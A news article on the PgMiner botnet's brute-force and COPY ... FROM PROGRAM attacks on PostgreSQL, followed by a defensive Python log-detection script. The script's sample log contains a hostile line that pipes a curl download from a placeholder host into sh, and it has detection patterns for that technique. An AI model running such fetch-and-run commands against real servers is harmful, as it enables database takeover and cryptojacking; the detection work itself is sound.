Security researchers discover PgMiner botnet that attacks PostgreSQL databases

Security researchers have discovered a botnet, referred to as PgMiner, that attacks weakly secured PostgreSQL databases running on Linux servers.

Palo Alto Networks’ Unit 42 reports that the botnet performs brute-force attacks against PostgreSQL databases that are reachable from the internet.

The attacks follow a fixed pattern.

First, the botnet picks a public network range at random (such as 18.xxx.xxx.xxx).

Then, it iterates through the addresses in that range looking for hosts with TCP port 5432 (PostgreSQL’s default port) exposed to the internet.

If a listening host is found, the botnet switches from scanning mode to brute-force mode.

At this point, it works through a long list of candidate passwords in an attempt to take over the default ‘postgres’ superuser account.

If the administrators have not disabled this account, or have left it with a weak or default password, the attackers get in.

Once they are in, they can run arbitrary shell commands on the host through PostgreSQL’s COPY ... FROM PROGRAM feature, which executes a command on the server as the operating-system user the database runs under (normally postgres) and so gives a foothold on the underlying operating system. The feature is reserved for superusers and, on PostgreSQL 11 and later, members of the pg_execute_server_program role, so a compromised postgres account is all that is needed.

From there, the PgMiner crew deploys a coin-mining application and tries to mine as much Monero cryptocurrency as possible before the infection is noticed.
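The attack chain above leaves three traces in a PostgreSQL server log: a burst of failed password logins for the postgres role from one client address, a later successful login from that same address, and a COPY ... FROM PROGRAM (or TO PROGRAM, which also runs a command) statement. The following Python script is an added example, not code from Unit 42, this article or the PgMiner operators, that picks those three signals out of a log. Everything in it is an assumption for illustration: the log format (log_line_prefix = '%m [%p] %h %q%u@%d ' and log_statement = 'all'), the constructed sample lines, the client address 18.100.0.5, and the threshold of five failures in sixty seconds.

```python
"""Spot PgMiner-style activity in a PostgreSQL server log.

Added example; it is not code from Unit 42, from this article or from the
PgMiner operators. Assumptions: log_line_prefix = '%m [%p] %h %q%u@%d '
(timestamp, pid, client host, user@database) and log_statement = 'all' so
that statements reach the log. Adjust LINE_RE for a different prefix.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) \S+ "  # %m: timestamp and zone
    r"\[(?P<pid>\d+)\] (?P<host>\S+) "                          # [%p] %h
    r"(?:(?P<user>[^@\s]+)@(?P<db>\S+) )?"                      # %q%u@%d, session lines only
    r"(?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)
AUTH_FAIL_RE = re.compile(r'password authentication failed for user "(?P<user>[^"]+)"')
AUTH_OK_RE = re.compile(r"connection authorized: user=(?P<user>\S+)")
# COPY ... TO PROGRAM runs a command just like FROM PROGRAM, so match both.
COPY_PROGRAM_RE = re.compile(r"\bCOPY\b.*\b(?:FROM|TO)\s+PROGRAM\b", re.IGNORECASE)

# Constructed sample log (not captured data). 18.100.0.5 plays the scanner.
SAMPLE_LOG = """\
2020-12-10 10:21:30.001 UTC [4021] 18.100.0.5 postgres@postgres FATAL:  password authentication failed for user "postgres"
2020-12-10 10:21:31.104 UTC [4022] 18.100.0.5 postgres@postgres FATAL:  password authentication failed for user "postgres"
2020-12-10 10:21:32.310 UTC [4023] 18.100.0.5 postgres@postgres FATAL:  password authentication failed for user "postgres"
2020-12-10 10:21:33.515 UTC [4024] 18.100.0.5 postgres@postgres FATAL:  password authentication failed for user "postgres"
2020-12-10 10:21:34.720 UTC [4025] 18.100.0.5 postgres@postgres FATAL:  password authentication failed for user "postgres"
2020-12-10 10:21:41.200 UTC [4030] 18.100.0.5 postgres@postgres LOG:  connection authorized: user=postgres database=postgres
2020-12-10 10:21:42.000 UTC [4030] 18.100.0.5 postgres@postgres LOG:  statement: COPY cmd_exec FROM PROGRAM 'curl -s http://example.invalid/x.sh | sh'
2020-12-10 11:00:00.000 UTC [4100] 10.0.0.7 app@appdb FATAL:  password authentication failed for user "app"
"""


def parse_line(raw):
    """Return the fields of one log line, or None for lines in another format."""
    m = LINE_RE.match(raw)
    if not m:
        return None
    fields = m.groupdict()
    fields["time"] = datetime.strptime(fields["ts"], "%Y-%m-%d %H:%M:%S.%f")
    return fields


def analyze(log_text, threshold=5, window_seconds=60):
    """Walk the log in order and return a list of alert dicts.

    brute_force:         threshold or more failed logins for one (client, role)
                         inside window_seconds (reported once per pair)
    brute_force_success: a later successful login for that same (client, role)
    copy_program:        any COPY ... FROM/TO PROGRAM statement
    """
    recent = defaultdict(deque)   # (host, role) -> timestamps of recent failures
    flagged = set()               # (host, role) pairs already reported
    alerts = []
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        fail = AUTH_FAIL_RE.search(ev["msg"])
        if fail:
            key = (ev["host"], fail["user"])
            times = recent[key]
            times.append(ev["time"])
            # Slide the window: drop failures older than window_seconds.
            while (ev["time"] - times[0]).total_seconds() > window_seconds:
                times.popleft()
            if len(times) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append({"type": "brute_force", "host": key[0], "role": key[1],
                               "failures": len(times), "at": ev["ts"]})
            continue
        ok = AUTH_OK_RE.search(ev["msg"])
        if ok:
            key = (ev["host"], ok["user"])
            if key in flagged:
                alerts.append({"type": "brute_force_success", "host": key[0],
                               "role": key[1], "at": ev["ts"]})
            continue
        if COPY_PROGRAM_RE.search(ev["msg"]):
            alerts.append({"type": "copy_program", "host": ev["host"], "role": ev["user"],
                           "statement": ev["msg"], "at": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The brute-force checks need only the default FATAL authentication messages plus the client host in the line prefix; the COPY check only works where statement logging (log_statement or an extension such as pgaudit) is switched on, which is not the default. Detection is the second line: a server that listens only on the interfaces that need it and whose postgres superuser has a strong password, or no password login at all, never gets as far as the fifth failed attempt.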

At the time the report was published, Unit 42 said the botnet could deploy its payload on the following platforms:

  • ARM
  • x64
  • Linux MIPS

One notable feature of the PgMiner botnet is that it controls infected systems through a command-and-control (C2) server reached over the Tor network.

The botnet’s codebase appears to be similar to that of the SystemdMiner botnet.

This is not the first time that crypto-mining attacks on PostgreSQL have appeared in the wild, though.

In 2018, similar attacks were observed; these were carried out by the StickyDB botnet.

Other databases have also been targeted by crypto-mining bots in the past, including:

  • MySQL
  • MSSQL
  • OrientDB
  • Redis